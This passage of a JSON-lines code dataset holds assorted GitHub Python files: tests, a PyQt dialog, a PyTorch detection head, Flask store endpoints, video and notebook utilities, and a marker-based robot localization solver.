test.complete and time.time() < end:\n time.sleep(.1)\n\n args = parser.parse_args(['--history', 'test.{}'.format(test.id)])\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n out.seek(0)\n output = out.readlines()[4:]\n statuses = test.status.history()\n self.assertEqual(len(output), len(statuses), msg='output: {}, statuses: {}'\n .format(output, statuses))\n for i in range(len(output)):\n self.assertTrue(statuses[i].state in output[i])\n","repo_name":"hpc/pavilion2","sub_path":"test/tests/status_cmd_tests.py","file_name":"status_cmd_tests.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"23522391003","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript for pressing hotkeys to save (Ctrl-S) with time interval in given seconds\r\n(!) It works only on Windows OS\r\n\r\n@author: volom\r\n\"\"\"\r\nimport time\r\nimport win32com.client\r\nshell = win32com.client.Dispatch(\"WScript.Shell\")\r\nsleep_time = int(input(\"Put time interval to save (seconds)\"))\r\nwhile True:\r\n shell.SendKeys('^s')\r\n time.sleep(sleep_time)\r\n print(\"SAVED\")\r\n \r\n \r\n ","repo_name":"volom/Office_Toolkit","sub_path":"hotkeys_save.py","file_name":"hotkeys_save.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32074756259","text":"from PyQt5.QtWidgets import QDialog\n\nfrom constants import SENSOR_ID_ROW, SENSOR_ID_COLUMN, SENSOR_ID_REGEX\nfrom controllers.sensor_controller import SensorController\nfrom gui.designer.new_sensor_model_sensor_id import Ui_Dialog\nfrom gui.dialogs.new_sensor_model_col_names_dialog import SensorModelColumnNamesDialog\n\n\nclass SensorModelIdDialog(QDialog, Ui_Dialog):\n\n def __init__(self, sensor_controller: SensorController, model: {}, model_id=None, test_file=None, parent=None):\n super().__init__()\n self.setupUi(self)\n self.sensor_controller = sensor_controller\n self.model_id = model_id\n self.test_file = test_file\n self.parent = parent\n\n self.model = model\n self.fill_existing_data()\n\n self.pushButton_previous.pressed.connect(self.open_previous_dialog)\n self.pushButton_next.pressed.connect(self.open_next_dialog)\n\n def fill_existing_data(self):\n if self.model[SENSOR_ID_ROW] is not None and self.model[SENSOR_ID_ROW] != -1:\n self.groupBox_sensor_id.setChecked(True)\n self.spinBox_row.setValue(self.model[SENSOR_ID_ROW] + 1)\n else:\n self.groupBox_sensor_id.setChecked(False)\n\n if self.model[SENSOR_ID_COLUMN] is not None and self.model[SENSOR_ID_COLUMN] != -1:\n self.checkBox_column.setChecked(True)\n self.spinBox_column.setValue(self.model[SENSOR_ID_COLUMN] + 1)\n else:\n self.checkBox_column.setChecked(False)\n\n if self.model[SENSOR_ID_REGEX] is not None and self.model[SENSOR_ID_REGEX] != '':\n self.checkBox_regex.setChecked(True)\n self.lineEdit_regex.setText(self.model[SENSOR_ID_REGEX])\n else:\n self.checkBox_regex.setChecked(False)\n\n def open_next_dialog(self):\n if self.groupBox_sensor_id.isChecked():\n self.model[SENSOR_ID_ROW] = self.spinBox_row.value() - 1\n self.model[SENSOR_ID_COLUMN] = self.spinBox_column.value() - 1 if self.checkBox_column.isChecked() else -1\n self.model[SENSOR_ID_REGEX] = self.lineEdit_regex.text() if self.checkBox_regex.isChecked() else ''\n else:\n self.model[SENSOR_ID_ROW] = -1\n self.model[SENSOR_ID_COLUMN] = -1\n self.model[SENSOR_ID_REGEX] = ''\n\n dialog = SensorModelColumnNamesDialog(\n self.sensor_controller,\n self.model,\n model_id=self.model_id,\n test_file=self.test_file,\n parent=self.parent)\n self.close()\n dialog.exec()\n\n def open_previous_dialog(self):\n from gui.dialogs.new_sensor_model_date_dialog import SensorModelDateDialog\n\n dialog = SensorModelDateDialog(\n self.sensor_controller,\n self.model,\n model_id=self.model_id,\n test_file=self.test_file,\n parent=self.parent\n )\n self.close()\n dialog.exec()\n","repo_name":"jacob-kamminga/AI-Sensus","sub_path":"gui/dialogs/new_sensor_model_id_dialog.py","file_name":"new_sensor_model_id_dialog.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17402791645","text":"\n# Neetcode - HashMap, TC = O(n), SC = O(n)\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n prevMap = {}\n \n for i, n in enumerate(nums):\n diff = target - n\n if diff in prevMap:\n return [prevMap[diff], i]\n prevMap[n] = i\n\n\n\n# # My code - Brute force, TC = O(n^2), SC = O(1)\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# i = 0\n# for i in range(i, len(nums)):\n# j = i + 1\n# for j in range(j, len(nums)):\n# if nums[i] + nums[j] == target:\n# return [i, j]","repo_name":"MinsuKin/leetcode","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2953096023","text":"import torch\n\nclass TextBox(torch.nn.Module):\n \n def __init__(self, in_channels, mbox=[4, 6, 6, 6, 4, 4]):\n super(TextBox, self).__init__()\n # text + background\n self.num_classes = 2\n # (x, y, w, h)\n self.loc_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * 4, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n # (x1, y1, x2, y2, x3, y3, x4, y4)\n self.quad_layers = torch.nn.ModuleList([\n torch.nn.Conv2(in_chnnels, num_box * 8, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n # (x1, y1, x2, y2, h)\n self.rot_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * 5 (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n self.conf_layers = torch.nn.ModuleList([\n torch.nn.Conv2d(in_channels, num_box * self.num_classes, (3, 5), padding=(1, 2)) for num_box in mbox\n ])\n\n def forward(self, feature_pyramids):\n locations = []\n quadrilaterals = []\n rotates = []\n confidences = []\n\n for (x, l, q, r, c) in zip(feature_pyramids, self.loc_layers, self.quad_layers, self.rot_layers, self.conf_layers):\n locations.append(l(x).permute(0, 2, 3, 1).contiguous())\n quadrilateral.append(q(x).permute(0, 2, 3, 1).contignous())\n rotates.append(r(x).permute(0, 2, 3, 1).contignous())\n confidences.append(c(x).permute(0, 2, 3 ,1).contiguous())\n \n locations = torch.cat([loc.view(loc.shape[0], -1) for loc in locations], 1)\n quadrilaterals = torch.cat([quad.view(quad.shape[0], -1) for quad in quadrilaterals], 1)\n rotates = torch.cat([rot.view(rot.shape[0], -1) for rot in rotates], 1)\n confidences = torch.cat([con.view(con.shape[0], -1) for con in confidences], 1)\n \n return (torch.cat([locations.view(locations.shape[0], -1, 4), \n quadrilaterals.view(quadrilaterals.shape[0], -1, 8),\n rotates.view(rotates.shape[0], -1, 5)],\n dim=2),\n confidences.view(confidences.shape[0], -1, self.num_classes))\n\n","repo_name":"BongkyuHwang/m2det","sub_path":"lib/layers/modules/text_box.py","file_name":"text_box.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10651418797","text":"#!/usr/bin/env python3\n\n__author__ = \"Fabian Golle \"\n__copyright__ = \"Fabian Golle \"\n__version__ = \"1.0\"\n__revision__ = \"f0b3ab7\"\n__status__ = \"Production\"\n\ndef abort(message):\n\tprint(message)\n\tquit()\n\ntry:\n\tfrom huvorffman import Huffman\n\tfrom rle import RunLenghtEncoding\nexcept Exception:\n\tabort('Import-failure')\n\n\ntestcases = [\n\t'abcdefghijklmnopqrstuvwxyz',\n\t'äüöß',\n\t'!\"§$%&/()=?=)(/&%$§\"',\n\t'¡“¶¢[]|{}≠¿',\n\t'1234567890',\n];\n\ni = 0\nfor t in testcases:\n\ttry:\n\t\thuff = Huffman()\n\t\trl = RunLenghtEncoding()\n\n\t\tencoded = huff.encode(t)\n\t\tif (t != huff.decode(encoded)):\n\t\t\traise Exception\n\n\t\tencoded = rl.encode(t)\n\t\tdecoded = rl.decode(encoded)\n\t\tif (t != decoded):\n\t\t\traise Exception\n\t\t\t\n\texcept Exception as e:\n\t\tprint(\"Testcase failed!\")\n\t\tprint(\"Input: \"+str(t))\n\t\tprint(\"Output: \"+str(decoded))\n\t\tif (len(str(e)) > 0):\n\t\t\tprint('Exception: ' + str(e))\n\telse:\n\t\ti += 1\n\nprint(str(i)+' of '+str(len(testcases))+' Testcases succeed')","repo_name":"micronax/python_huffman_rle_compressor","sub_path":"testcases.py","file_name":"testcases.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26204721654","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, jsonify, request\nfrom flask.ext.login import login_required, current_user\nfrom app.api import auto, db\nfrom app.api.constants import BAD_REQUEST, OK\nfrom app.api.recipes.views_v2 import recipe_response_builder, set_response_builder\nfrom app.api.sets.model import Set, UserSet, VendorSet\nfrom app.api.users.constants import FOREVER\n\n\nmod = Blueprint('sets', __name__, url_prefix='/api_v2/sets')\n\n@auto.doc()\n@mod.route('/', methods=['GET'])\ndef get_set(id):\n \"\"\"\n Get information about set.\n :param id: set id\n :return: json with parameters:\n error_code - server response_code\n result - information about category\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n set = Set.query.get(id)\n if not set:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'not ok'}), 200 # set with `id` isn't exist\n information = set_response_builder(set, lang, vendor_id)\n information['recipes'] = []\n for recipe in set.recipes:\n information['recipes'].append(recipe_response_builder(recipe, lang, vendor_id))\n return jsonify({'error_code': OK, 'result': information}), 200\n\n\n@auto.doc()\n@mod.route('/', methods=['GET'])\ndef get_all_sets():\n \"\"\"\n Get information about all exist sets.\n :param offset (GET param) : starts from which set\n :param limit (GET param) : how many sets you want to get\n :return: json with parameters:\n error_code - server response_code\n result - information about sets\n entities_count - number of sets\n ids - ids of all sets\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n sets = []\n offset = request.args.get('offset', default=0, type=int)\n limit = request.args.get('limit', type=int)\n count = Set.query.count()\n # if limit is not None and offset is not None:\n # sets_band = Set.query.slice(start=offset, stop=limit+offset).all()\n # else:\n # sets_band = Set.query.all()\n sets_band = Set.query.all()\n for set in sets_band:\n information = set_response_builder(set, lang, vendor_id)\n sets.append(information)\n sets = sorted(sets, key=lambda k: k['is_open'], reverse=True)\n if limit is not None and offset is not None:\n sets = sets[offset:limit+offset]\n ids = []\n sets_ids = Set.query.all()\n for set_id in sets_ids:\n ids.append(set_id.id)\n return jsonify({'error_code': OK, 'result': sets, 'ids': ids, 'entities_count': count}), 200\n\n\n@auto.doc()\n@mod.route('/buy_set', methods=['POST'])\n# @login_required\ndef buy_set():\n \"\"\"\n Buy set with store id in json. List of parameters in json request (one of them is required):\n store_id\n Example of request:\n {\"store_id\": \"1\"}\n :return: json with parameters:\n error_code - server response_code\n result - information about set\n \"\"\"\n lang = request.args.get('lang', type=unicode, default=u'en')\n vendor_id = request.args.get('vendor_id', type=unicode, default=u'')\n store_id = request.json.get('store_id')\n if store_id is None:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'missing arguments'}), 200 # missing arguments\n set = Set.query.filter_by(store_id=store_id).first()\n if not set:\n set = Set.query.filter_by(sale_store_id=store_id).first()\n if not set:\n return jsonify({'error_code': BAD_REQUEST, 'result': 'set not exist'}), 200\n # user_set = UserSet(user_id=current_user.id, set_id=set.id, open_type=FOREVER)\n vendor_set = VendorSet(vendor_id=vendor_id, set_id=set.id)\n db.session.add(vendor_set)\n db.session.commit()\n information = set_response_builder(set, lang, vendor_id)\n information['recipes'] = []\n for recipe in set.recipes:\n information['recipes'].append(recipe_response_builder(recipe, lang, vendor_id))\n return jsonify({'error_code': OK, 'result': information}), 200\n","repo_name":"megge-dream/culinaryon","sub_path":"app/api/sets/views_v2.py","file_name":"views_v2.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26022815783","text":"import time\r\n\r\nfrom cv2 import cvtColor, COLOR_RGB2GRAY, COLOR_GRAY2RGB\r\nimport os\r\n\r\nos.environ[\"IMAGEIO_FFMPEG_EXE\"] = 'ffmpeg.exe'\r\nfrom moviepy.video.io.VideoFileClip import VideoFileClip\r\nfrom moviepy.video.io.ImageSequenceClip import ImageSequenceClip\r\nfrom moviepy.video.io.preview import preview\r\nimport pygame\r\n\r\n#works without the .exe also\r\npygame.init()\r\n\r\npygame.display.set_caption('Show Video on screen')\r\n\r\nvideo = VideoFileClip('contents/videos/video.mp4')\r\n\r\nduration = video.duration\r\nfps = video.fps\r\ncount =1\r\ngray_frames = []\r\n\r\ndef gray(image):\r\n \"\"\"Flips an image vertically \"\"\"\r\n gray = cvtColor(image, COLOR_RGB2GRAY)\r\n rgb= cvtColor(gray,COLOR_GRAY2RGB)\r\n return rgb # remember that image is a numpy array\r\n\r\nnew_frames = [ gray(frame) for frame in video.iter_frames()]\r\ntime.sleep(1)\r\n\r\nclips = ImageSequenceClip(new_frames, fps = fps, durations = duration)\r\n#\r\npreview(clips)\r\n\r\n# clips.write_videofile(\"contents/videos/video_gray.mp4\")\r\npygame.quit()\r\n\r\n","repo_name":"southglory/small_works","sub_path":"Contents2exe_distrib/mp4_showAsGray.py","file_name":"mp4_showAsGray.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32349819594","text":"#!/usr/bin/env python\n## This script was from a stack-overflow recommendation hosted on a github gist\n\"\"\"strip outputs from an IPython Notebook\n \nOpens a notebook, strips its output, and writes the outputless version to the original file.\n \nUseful mainly as a git pre-commit hook for users who don't want to track output in VCS.\n \nThis does mostly the same thing as the `Clear All Output` command in the notebook UI.\n\"\"\"\n\nimport io\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef strip_output(nb):\n \"\"\"strip the outputs from a notebook object\"\"\"\n nb.metadata.pop(\"signature\", None)\n for cell in nb.worksheets[0].cells:\n if \"outputs\" in cell:\n cell[\"outputs\"] = []\n if \"prompt_number\" in cell:\n cell[\"prompt_number\"] = None\n return nb\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"USAGE: {0} \".format(sys.argv[0]))\n print(\"\")\n print(\"for i in *.ipynb; do ./{0} $i; done\".format(sys.argv[0]))\n sys.exit(-1)\n filename = sys.argv[1]\n with io.open(filename, \"r\", encoding=\"utf8\") as f:\n nb = current.read(f, \"json\")\n nb_out = strip_output(nb)\n if nb != nb_out:\n with io.open(filename, \"w\", encoding=\"utf8\") as f:\n current.write(nb_out, f, \"json\")\n sys.exit(1)\n sys.exit(0)\n","repo_name":"InsightSoftwareConsortium/SimpleITK-Notebooks","sub_path":"Utilities/ClearAllOutputs.py","file_name":"ClearAllOutputs.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":769,"dataset":"github-code","pt":"3"} +{"seq_id":"44449329231","text":"\"\"\"\nExercício Python 44: Elabore um programa que calcule o valor a ser pago por um produto,\nconsiderando o seu preço normal e condição de pagamento:\n\n– à vista dinheiro/cheque: 10% de desconto\n\n– à vista no cartão: 5% de desconto\n\n– em até 2x no cartão: preço formal\n\n– 3x ou mais no cartão: 20% de juros\n\n\"\"\"\nprint('=+'*20)\nprint('{:=^40}'.format(' VENDA DE PRODUTOS '))\nprint('=+'*20)\nprint('\\n')\nvalor_produto = float(input('Informe o valor do produto: '))\nforma_pagamento = int(input('''Formas de pagamento\n1 - À vista dinheiro ou cheque: 10% de desconto\n2 – à vista no cartão: 5% de desconto\n3 – em até 2x no cartão: preço formal\n4 - 3x ou mais no cartão: 20% de juros \nEscolha a opção: '''))\n\nif forma_pagamento == 1:\n preco_final = valor_produto - (valor_produto * 0.10)\n print(f'Valor total a pagar à vista com desconto de 10%: R${preco_final:.2f}.')\nelif forma_pagamento == 2:\n preco_final = valor_produto - (valor_produto * 0.05)\n # print(f'Valor das parcelas: R${preco_final/2:.2f}.')\n print(f'Valor total a pagar à vista no cartão com 5% de desconto: R${preco_final:.2f}.')\nelif forma_pagamento == 3:\n preco_final = valor_produto\n print(f'Valor das parcelas: R${preco_final / 2:.2f}.')\n print(f'Valor total a pagar à vista em até 2x no cartão: R${preco_final:.2f}.')\nelif forma_pagamento == 4:\n qtd_parcelas = int(input('Informe a quantidade de parcelas:'.strip()))\n preco_final = valor_produto + (valor_produto * 0.20)\n print(f'Valor das parcelas: R${preco_final/qtd_parcelas:.2f}.')\n print(f'Valor total a pagar em {qtd_parcelas}x no cartão com 20% de juros: R${preco_final:.2f}.')\n\nelse:\n print('OPÇÃO INVÁLIDA! Tente novamente.')\n","repo_name":"jandersoncoelho/expython","sub_path":"ex044.py","file_name":"ex044.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14184685302","text":"import numpy as np\nimport cv2\nfrom code_centres_script import codes_centres\n\n#N_SOLVE_ITERATIONS = 15\nN_SOLVE_ITERATIONS = 30\n\nCODE_SIZE_REAL = 117.0 # mm\n\nMM_IN_CM = 10.0\n\n\ncodes_centres = np.asarray(codes_centres)\ncodes_centres[:, 2:4] = MM_IN_CM * codes_centres[:, 2:4]\nn_codes = codes_centres.shape[0]\n\nPOSITIONS_CODES_REAL = np.zeros((n_codes, 2, 2), np.float32)\n#POSITIONS_CODES_REAL[code_no, point_no, x/y]\nNOS_CODES_REAL = np.zeros((n_codes), np.int64)\n\nfor point_index in range(n_codes):\n code_centre = codes_centres[point_index, :]\n place_no = code_centre[0]\n angle = code_centre[1]\n x = code_centre[2]\n y = code_centre[3]\n \n x11 = - CODE_SIZE_REAL / 2\n y11 = 0.0\n x12 = CODE_SIZE_REAL / 2\n y12 = 0.0\n \n angle_radians = np.pi * angle / 180.0\n sin = np.sin(angle_radians)\n cos = np.cos(angle_radians)\n \n \n \n x21 = x11 * cos + y11 * (-sin)\n y21 = x11 * sin + y11 * cos\n \n x22 = x12 * cos + y12 * (-sin)\n y22 = x12 * sin + y12 * cos\n \n \n \n x31 = x21 + x\n y31 = y21 + y\n \n x32 = x22 + x\n y32 = y22 + y\n \n \n \n POSITIONS_CODES_REAL[point_index, 0, 0] = x31\n POSITIONS_CODES_REAL[point_index, 0, 1] = y31\n POSITIONS_CODES_REAL[point_index, 1, 0] = x32\n POSITIONS_CODES_REAL[point_index, 1, 1] = y32\n \n NOS_CODES_REAL[point_index] = place_no\n #print('NOS_CODES_REAL[point_index] =', NOS_CODES_REAL[point_index])\n\n\n\n\n\nX_TO_ANGLE_X_LIMITS = [90, 1270]\nX_TO_ANGLE_TAILOR_COEFFS = \\\n [-0.002227464637962487, 0.3212660622990047, -0.003478867250403373, 0.1909035743393775, -0.0044976791528199165, 0.12648175837018866, -0.005129167400927317]\nX_TO_ANGLE_FX = 617.8249050804442\nX_TO_ANGLE_CX = 673.0536941293645\n\n#POSITIONS_CODES_REAL[code_no, point_no, x/y]\n# get real codes normals\nnormals_real_codes = np.zeros((POSITIONS_CODES_REAL.shape[0], 2), np.float32)\ntangents_real_codes = POSITIONS_CODES_REAL[:, 1, :] - POSITIONS_CODES_REAL[:, 0, :]\ncenters_real_codes = (POSITIONS_CODES_REAL[:, 1, :] + POSITIONS_CODES_REAL[:, 0, :]) / 2\ntangents_real_codes = tangents_real_codes / np.sqrt(np.sum(tangents_real_codes**2, axis=1, keepdims=True))\n\nnormals_real_codes[:, 0] = -tangents_real_codes[:, 1]\nnormals_real_codes[:, 1] = tangents_real_codes[:, 0]\n\n\ndef select_codes_in_limits(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n \n if x_detected_all.size > 0:\n condition = (X_TO_ANGLE_X_LIMITS[0] <= x_detected_pairs_all) & (x_detected_pairs_all <= X_TO_ANGLE_X_LIMITS[1])\n condition_codewise = np.all(condition, axis=1)\n \n x_detected_all = x_detected_all[condition_codewise]\n y_detected_all = y_detected_all[condition_codewise]\n code_detected_all = code_detected_all[condition_codewise]\n code_size_all = code_size_all[condition_codewise]\n x_detected_pairs_all = x_detected_pairs_all[condition_codewise, :]\n y_detected_pairs_all = y_detected_pairs_all[condition_codewise, :]\n \n return x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all\n\ndef x_to_angle(x):\n xss = (x - X_TO_ANGLE_CX) / X_TO_ANGLE_FX\n xs = np.copy(xss)\n power = np.copy(xss)\n for monom_index in range(len(X_TO_ANGLE_TAILOR_COEFFS)):\n power *= xss\n xs += X_TO_ANGLE_TAILOR_COEFFS[monom_index] * power\n angles = np.arctan(xs)\n return angles\n\ndef select_existed_codes(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n \n if x_detected_all.size > 0:\n \n condition_codewise = np.zeros(x_detected_all.size, np.bool)\n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n if index_found.size == 1:\n condition_codewise[detected_index] = True\n\n \n \n \n x_detected_all = x_detected_all[condition_codewise]\n y_detected_all = y_detected_all[condition_codewise]\n code_detected_all = code_detected_all[condition_codewise]\n code_size_all = code_size_all[condition_codewise]\n x_detected_pairs_all = x_detected_pairs_all[condition_codewise, :]\n y_detected_pairs_all = y_detected_pairs_all[condition_codewise, :]\n \n return x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all\n\n \n \ndef localize(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all):\n \n x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all = \\\n select_codes_in_limits(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all)\n \n x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all = \\\n select_existed_codes(x_detected_all, y_detected_all, code_detected_all, code_size_all, x_detected_pairs_all, y_detected_pairs_all)\n \n is_localized = False\n current_solution = np.zeros((3, 1), np.float32)\n current_solution_iterations = None\n right_side_iterations = None\n angles_detected_pairs_all = None\n detected_to_real_indexing = None\n if x_detected_all.size >= 2: # must be at least two codes\n \n \n angles_detected_pairs_all = x_to_angle(x_detected_pairs_all)\n angles_detected_pairs_all = -angles_detected_pairs_all[:,::-1] # because upsidedown\n\n\n ## sort by 1st point, not necessary because it will be resorded by code:\n #sort_indexes = np.argsort(angles_detected_pairs_all[:, 0])\n #angles_detected_pairs_all = angles_detected_pairs_all[sort_indexes, :]\n #code_detected_all = code_detected_all[sort_indexes]\n \n # sort inside pairs in inverse order becuase real and detected orders in pair are oposite:\n for detected_index in range(angles_detected_pairs_all.shape[0]):\n sort_indexes = np.argsort(angles_detected_pairs_all[detected_index, :])[::-1]\n angles_detected_pairs_all[detected_index, :] = angles_detected_pairs_all[detected_index, sort_indexes]\n \n #print('code_detected_all =', code_detected_all)\n #print('angles_detected_pairs_all * 180 / np.pi =', angles_detected_pairs_all * 180 / np.pi )\n \n \n angular_sizes_detected_all = angles_detected_pairs_all[:, 0] - angles_detected_pairs_all[:, 1]\n \n \n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n \n # match detected and real indexing by codes:\n \n detected_to_real_indexing = np.zeros(code_detected_all.size, np.int64)\n for detected_index in range(code_detected_all.size):\n index_found = np.where(NOS_CODES_REAL == code_detected_all[detected_index])[0]\n if index_found.size == 1:\n detected_to_real_indexing[detected_index] = index_found\n else:\n print('index_found.size != 1 somthing wrong', index_found.size)\n \n \n\n # initial guiess:\n max_index = np.argmax(angular_sizes_detected_all)\n max_index_real = detected_to_real_indexing[max_index]\n distance_estimate = CODE_SIZE_REAL / angular_sizes_detected_all[max_index]\n xy_initial = centers_real_codes[max_index_real, :] + distance_estimate * normals_real_codes[max_index_real, :]\n #xy_initial[0] = 1887\n #xy_initial[1] = 1704 # for debug, this is probably real point\n directions_for_estimate = centers_real_codes - xy_initial\n directions_for_estimate_normalized = directions_for_estimate / np.sqrt(np.sum(directions_for_estimate **2, axis=1, keepdims=True))\n mean_direction = np.sum(directions_for_estimate_normalized, axis=0)\n #mean_direction = mean_direction / np.sqrt(np.sum(mean_direction**2))\n angle_initial = np.arctan2(mean_direction[1], mean_direction[0])\n \n # iterations:\n right_side = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n dot_products = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n ray_angle_all = np.zeros(angles_detected_pairs_all.shape[0] * 2, np.float32)\n jacobain = np.zeros((angles_detected_pairs_all.shape[0] * 2, 3), np.float32)\n initial_solution = np.zeros((3, 1), np.float32)\n initial_solution[0, 0] = xy_initial[0]\n initial_solution[1, 0] = xy_initial[1]\n initial_solution[2, 0] = angle_initial\n # F_i = 1 - dot_product = 1 - ((x_i - x) * cos(gamma - alpha) / sqrt((x_i - x)**2 + (y_i - y)**2) + (y_i - y) * sin(gamma - alpha) / sqrt((x_i - x)**2 + (y_i - y)**2)\n # F(X) = 0\n # F(X + dX) = 0\n # F(X) + J*dX = 0\n # J*dX = -F(X)\n # X_i+1 = X_i + learning_rate * dX\n \n #initial_solution[0, 0] = -673.0\n #initial_solution[1, 0] = 1189.0\n #initial_solution[2, 0] = -0.9797\n \n \n #print('detected_to_real_indexing =', detected_to_real_indexing)\n \n #print('real prepared: ', POSITIONS_CODES_REAL[detected_to_real_indexing, :, :])\n \n current_solution = np.copy(initial_solution)\n current_solution_iterations = np.zeros((3, N_SOLVE_ITERATIONS + 1), np.float32)\n current_solution_iterations[:, 0] = current_solution.flatten()\n right_side_iterations = np.zeros((N_SOLVE_ITERATIONS + 1, angles_detected_pairs_all.shape[0] * 2), np.float32)\n right_side_iterations[0, :] = right_side\n #dst_mean = np.zeros((3, 1), np.float32)\n for iterations_index in range(N_SOLVE_ITERATIONS):\n global_index = 0\n for detected_index in range(angles_detected_pairs_all.shape[0]):\n index_real = detected_to_real_indexing[detected_index]\n for in_pair_index in range(2):\n angle_code = angles_detected_pairs_all[detected_index, in_pair_index]\n ray_angle = current_solution[2, 0] - angle_code\n \n # POSITIONS_CODES_REAL[code_no, point_no, x/y]\n x_real = POSITIONS_CODES_REAL[index_real, in_pair_index, 0]\n y_real = POSITIONS_CODES_REAL[index_real, in_pair_index, 1]\n sin_ray_angle = np.sin(ray_angle)\n cos_ray_angle = np.cos(ray_angle)\n dx = (x_real - current_solution[0, 0])\n dy = (y_real - current_solution[1, 0])\n dx2 = dx**2\n dy2 = dy**2\n distance = np.sqrt(dx2 + dy2)\n right_side[global_index] = -(1 - ((dx * cos_ray_angle + dy * sin_ray_angle) / distance))\n dot_products[global_index] = (x_real - current_solution[0, 0]) * cos_ray_angle + (y_real - current_solution[1, 0]) * sin_ray_angle\n distance3 = distance**3\n #jacobain[global_index, 0] = dy2 * cos_ray_angle / distance3\n #jacobain[global_index, 1] = dx2 * sin_ray_angle / distance3\n jacobain[global_index, 0] = -((dx * (sin_ray_angle * dy + cos_ray_angle * dx) / distance3) - (cos_ray_angle / distance))\n jacobain[global_index, 1] = -((dy * (sin_ray_angle * dy + cos_ray_angle * dx) / distance3) - (sin_ray_angle / distance))\n jacobain[global_index, 2] = - ((dx * (-sin_ray_angle) + dy * cos_ray_angle) / distance)\n \n #if iterations_index == (N_SOLVE_ITERATIONS - 1):\n # print('x_real =', x_real, ' y_real =', y_real, 'ray_angle =', ray_angle * 180 / np.pi)\n \n global_index += 1\n retval, dst\t= cv2.solve(jacobain, right_side, None, cv2.DECOMP_SVD)\n \n #if iterations_index == (N_SOLVE_ITERATIONS - 1):\n # print('right_side =', right_side)\n # print('jacobain =', jacobain)\n # print('retval =',retval)\n # print('dst =', dst)\n # print('current_solution[0: 2, 0] =', current_solution[0: 2, 0])\n # print('current_solution[2, 0] =', current_solution[2, 0] * 180 / np.pi)\n \n \n \n #beta = 0.3\n #dst_mean = beta * dst_mean + (1 - beta) * dst\n \n #print(' ')\n #print('retval =', retval)\n #print('right_side =', right_side)\n #print('np.max(-right_side) =', np.max(-right_side))\n #print('dot_products =', dot_products)\n #print('current_solution =', current_solution)\n \n current_solution = current_solution + 0.7 * dst\n \n current_solution_iterations[:, iterations_index + 1] = current_solution.flatten()\n right_side_iterations[iterations_index + 1, :] = right_side\n \n is_localized = True\n return is_localized, current_solution, current_solution_iterations, right_side_iterations, code_detected_all, angles_detected_pairs_all, detected_to_real_indexing\n","repo_name":"vedenev/buggy","sub_path":"raw_codes/localize_2020_12_04.py","file_name":"localize_2020_12_04.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30899635304","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom pymongo import MongoClient\n\n\nclass LeroymerlinPipeline:\n def __init__(self):\n client = MongoClient('localhost')\n 